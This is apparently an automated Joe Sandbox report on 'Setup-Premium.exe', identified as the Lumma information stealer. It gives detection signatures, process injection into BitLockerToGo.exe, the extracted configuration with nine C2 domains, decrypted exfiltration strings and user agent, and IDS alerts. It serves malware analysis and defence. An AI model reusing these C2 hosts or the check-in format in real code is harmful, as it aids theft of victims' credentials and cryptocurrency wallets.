Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup-Premium.exe

Overview

General Information

Sample name:Setup-Premium.exe
Analysis ID:1532359
MD5:65ab8081d6a7f813a39bd06052fa5887
SHA1:3a2724a4b2e33d1aeb93eadf4e0e2916b5c0450d
SHA256:3dd3a9ee5cbe4e846be6f6921e8b1fe56317e5a292768625e8710061581d90ec
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Setup-Premium.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\Setup-Premium.exe" MD5: 65AB8081D6A7F813A39BD06052FA5887)
    • BitLockerToGo.exe (PID: 3748 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["vennurviot.sbs", "condifendteu.sbs", "mathcucom.sbs", "enlargkiw.sbs", "proclaimykn.buzz", "resinedyw.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "allocatinow.sbs"], "Build id": "tLYMe5--2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.BitLockerToGo.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            2.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.2.Setup-Premium.exe.2800000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0.2.Setup-Premium.exe.2800000.2.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:13.809431+020020546531A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
                  2024-10-13T01:44:14.796868+020020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
                  2024-10-13T01:44:15.767746+020020546531A Network Trojan was detected192.168.2.549707172.67.152.13443TCP
                  2024-10-13T01:44:17.530500+020020546531A Network Trojan was detected192.168.2.549710172.67.205.156443TCP
                  2024-10-13T01:44:19.560631+020020546531A Network Trojan was detected192.168.2.549714172.67.140.193443TCP
                  2024-10-13T01:44:20.503224+020020546531A Network Trojan was detected192.168.2.549724172.67.173.224443TCP
                  2024-10-13T01:44:21.464056+020020546531A Network Trojan was detected192.168.2.549729104.21.79.35443TCP
                  2024-10-13T01:44:22.318748+020020546531A Network Trojan was detected192.168.2.549738188.114.96.3443TCP
                  2024-10-13T01:44:24.377334+020020546531A Network Trojan was detected192.168.2.549751104.21.53.8443TCP
                  2024-10-13T01:44:25.412146+020020546531A Network Trojan was detected192.168.2.549757104.21.53.8443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:13.809431+020020498361A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
                  2024-10-13T01:44:14.796868+020020498361A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
                  2024-10-13T01:44:15.767746+020020498361A Network Trojan was detected192.168.2.549707172.67.152.13443TCP
                  2024-10-13T01:44:17.530500+020020498361A Network Trojan was detected192.168.2.549710172.67.205.156443TCP
                  2024-10-13T01:44:19.560631+020020498361A Network Trojan was detected192.168.2.549714172.67.140.193443TCP
                  2024-10-13T01:44:20.503224+020020498361A Network Trojan was detected192.168.2.549724172.67.173.224443TCP
                  2024-10-13T01:44:21.464056+020020498361A Network Trojan was detected192.168.2.549729104.21.79.35443TCP
                  2024-10-13T01:44:22.318748+020020498361A Network Trojan was detected192.168.2.549738188.114.96.3443TCP
                  2024-10-13T01:44:24.377334+020020498361A Network Trojan was detected192.168.2.549751104.21.53.8443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:25.412146+020020498121A Network Trojan was detected192.168.2.549757104.21.53.8443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:21.017673+020020565591Domain Observed Used for C2 Detected192.168.2.549729104.21.79.35443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:21.974390+020020565571Domain Observed Used for C2 Detected192.168.2.549738188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:20.054032+020020565611Domain Observed Used for C2 Detected192.168.2.549724172.67.173.224443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:15.332555+020020565671Domain Observed Used for C2 Detected192.168.2.549707172.67.152.13443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:14.362224+020020565711Domain Observed Used for C2 Detected192.168.2.549705188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:17.105383+020020565651Domain Observed Used for C2 Detected192.168.2.549710172.67.205.156443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:18.054859+020020565631Domain Observed Used for C2 Detected192.168.2.549714172.67.140.193443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:14.803554+020020565681Domain Observed Used for C2 Detected192.168.2.5541131.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:20.524057+020020565581Domain Observed Used for C2 Detected192.168.2.5509681.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:21.465912+020020565561Domain Observed Used for C2 Detected192.168.2.5602321.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:19.562795+020020565601Domain Observed Used for C2 Detected192.168.2.5591391.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:14.812869+020020565661Domain Observed Used for C2 Detected192.168.2.5635611.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:13.830191+020020565701Domain Observed Used for C2 Detected192.168.2.5523561.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:15.770723+020020565641Domain Observed Used for C2 Detected192.168.2.5571191.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:17.533350+020020565621Domain Observed Used for C2 Detected192.168.2.5631841.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-13T01:44:23.583545+020028586661Domain Observed Used for C2 Detected192.168.2.549744104.102.49.254443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                  Found malware configuration
                  Source: 0.2.Setup-Premium.exe.2800000.2.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["vennurviot.sbs", "condifendteu.sbs", "mathcucom.sbs", "enlargkiw.sbs", "proclaimykn.buzz", "resinedyw.sbs", "ehticsprocw.sbs", "drawwyobstacw.sbs", "allocatinow.sbs"], "Build id": "tLYMe5--2"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Sample uses string decryption to hide its real strings
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: proclaimykn.buzz
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: proclaimykn.buzz
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--2
                  Source: Setup-Premium.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.5:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49757 version: TLS 1.2
                  Source: Setup-Premium.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: BitLockerToGo.pdb source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdbGCTL source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor byte ptr [esp+eax+0Ch], al2_2_0043A2CA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_0042D060
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx2_2_0042D060
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+08h], edx2_2_00401000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]2_2_00401000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]2_2_00401000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx-5CFF4EA3h]2_2_00429000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00426000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00426000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0040D0D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004370D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-4BD95CB5h]2_2_0042C0F5
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 21912799h2_2_0040E086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000F2h]2_2_0041F0A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_004401EA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor byte ptr [esp+eax], al2_2_0043E2C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 2Eh2_2_0042A2F3
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_00411333
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h2_2_004203A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+edx]2_2_004013A7
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor byte ptr [esp+eax+000000C0h], al2_2_00421490
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004424B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+6C7927FBh]2_2_004424B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25B56195h]2_2_0042C5F0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_0043C580
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_00405640
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+edx]2_2_00401655
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp+10h]2_2_00401655
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax2_2_0040F74C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004427C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+6C7927FBh]2_2_004427C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-18h]2_2_0041D8C8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041D8C8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_0042C8F2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+08h], edx2_2_004018F3
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00442880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+6C7927FBh]2_2_00442880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+00000356h]2_2_0042E940
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax2_2_0042E940
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0042E940
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+6C7927FBh]2_2_00442960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edi+edx-15h]2_2_0042B984
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00443A60
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+08h], edx2_2_00401A7D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-28D9FA8Bh]2_2_00410A15
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_0041CA20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h2_2_0040EB50
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then xor byte ptr [esp+edx+0Ch], dl2_2_0043DB50
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi]2_2_0043AB70
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+04h]2_2_0040EBD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h2_2_00420C90
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+edx], 0000h2_2_00420C90
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+25B56195h]2_2_0042CC9C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_0042CC9C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi]2_2_0042BCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042DD20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00425DA0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, edx2_2_00427E23
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax2_2_00409EC0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0041CEB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ecx+ebp]2_2_00440F74

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.5:52356 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.5:57119 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.5:50968 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.5:49714 -> 172.67.140.193:443
                  Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.5:49707 -> 172.67.152.13:443
                  Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.5:63561 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.5:49729 -> 104.21.79.35:443
                  Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.5:49738 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.5:54113 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.5:49710 -> 172.67.205.156:443
                  Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.5:49724 -> 172.67.173.224:443
                  Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.5:63184 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.5:60232 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.5:59139 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 172.67.152.13:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.152.13:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49729 -> 104.21.79.35:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49729 -> 104.21.79.35:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49714 -> 172.67.140.193:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49714 -> 172.67.140.193:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49710 -> 172.67.205.156:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49738 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49738 -> 188.114.96.3:443
